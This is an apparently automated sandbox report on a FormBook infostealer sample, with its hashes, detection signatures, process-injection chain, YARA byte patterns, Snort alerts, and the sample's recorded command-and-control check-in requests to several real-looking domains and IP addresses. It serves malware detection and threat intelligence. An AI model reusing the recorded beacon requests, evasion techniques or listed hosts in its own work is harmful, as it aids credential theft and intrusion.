Loading ...

Play interactive tourEdit tour

Analysis Report 20210113432.exe

Overview

General Information

Sample Name:20210113432.exe
Analysis ID:339348
MD5:13dbc9c1c5a2811ecbee5f420c9c75b6
SHA1:6b01e540d3757944b61baa187159a908e170d5ae
SHA256:ba41656ca5e0e243cff9f6a536c43998a9dbc492f5e813a0022e84359b2e0ef8
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 20210113432.exe (PID: 1476 cmdline: 'C:\Users\user\Desktop\20210113432.exe' MD5: 13DBC9C1C5A2811ECBEE5F420C9C75B6)
    • 20210113432.exe (PID: 5320 cmdline: C:\Users\user\Desktop\20210113432.exe MD5: 13DBC9C1C5A2811ECBEE5F420C9C75B6)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5300 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 6292 cmdline: /c del 'C:\Users\user\Desktop\20210113432.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.20210113432.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.20210113432.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.20210113432.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        2.2.20210113432.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.20210113432.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\Desktop\20210113432.exe', CommandLine: /c del 'C:\Users\user\Desktop\20210113432.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 5300, ProcessCommandLine: /c del 'C:\Users\user\Desktop\20210113432.exe', ProcessId: 6292

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: 20210113432.exeVirustotal: Detection: 28%Perma Link
          Source: 20210113432.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 20210113432.exeJoe Sandbox ML: detected
          Source: 2.2.20210113432.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20210113432.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 20210113432.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe, 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 4x nop then pop edi2_2_00416C8E
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 4x nop then pop edi2_2_00417D5A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi10_2_00856C8E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi10_2_00857D5A

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ== HTTP/1.1Host: www.miproper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.fordexplorerproblems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.exoticorganicwine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ== HTTP/1.1Host: www.miproper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.fordexplorerproblems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.exoticorganicwine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.semaindustrial.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 20210113432.exeString found in binary or memory: http://tempuri.org/_391backDataSet.xsd
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000002.623532384.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419D50 NtCreateFile,2_2_00419D50
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419E00 NtReadFile,2_2_00419E00
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419E80 NtClose,2_2_00419E80
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419F30 NtAllocateVirtualMemory,2_2_00419F30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949840 NtDelayExecution,LdrInitializeThunk,10_2_04949840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04949860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049499A0 NtCreateSection,LdrInitializeThunk,10_2_049499A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049495D0 NtClose,LdrInitializeThunk,10_2_049495D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04949910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949540 NtReadFile,LdrInitializeThunk,10_2_04949540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049496D0 NtCreateKey,LdrInitializeThunk,10_2_049496D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049496E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_049496E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949650 NtQueryValueKey,LdrInitializeThunk,10_2_04949650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A50 NtCreateFile,LdrInitializeThunk,10_2_04949A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04949660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949780 NtMapViewOfSection,LdrInitializeThunk,10_2_04949780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949FE0 NtCreateMutant,LdrInitializeThunk,10_2_04949FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949710 NtQueryInformationToken,LdrInitializeThunk,10_2_04949710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049498A0 NtWriteVirtualMemory,10_2_049498A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049498F0 NtReadVirtualMemory,10_2_049498F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949820 NtEnumerateKey,10_2_04949820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494B040 NtSuspendThread,10_2_0494B040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049499D0 NtCreateProcessEx,10_2_049499D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049495F0 NtQueryInformationFile,10_2_049495F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494AD30 NtSetContextThread,10_2_0494AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949520 NtWaitForSingleObject,10_2_04949520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949950 NtQueueApcThread,10_2_04949950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949560 NtWriteFile,10_2_04949560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A80 NtOpenDirectoryObject,10_2_04949A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949610 NtEnumerateValueKey,10_2_04949610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A10 NtQuerySection,10_2_04949A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A00 NtProtectVirtualMemory,10_2_04949A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A20 NtResumeThread,10_2_04949A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949670 NtQueryInformationProcess,10_2_04949670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494A3B0 NtGetContextThread,10_2_0494A3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049497A0 NtUnmapViewOfSection,10_2_049497A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494A710 NtOpenProcessToken,10_2_0494A710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949B00 NtSetValueKey,10_2_04949B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949730 NtQueryVirtualMemory,10_2_04949730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949770 NtSetInformationFile,10_2_04949770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494A770 NtOpenThread,10_2_0494A770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949760 NtOpenProcess,10_2_04949760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00859D50 NtCreateFile,10_2_00859D50
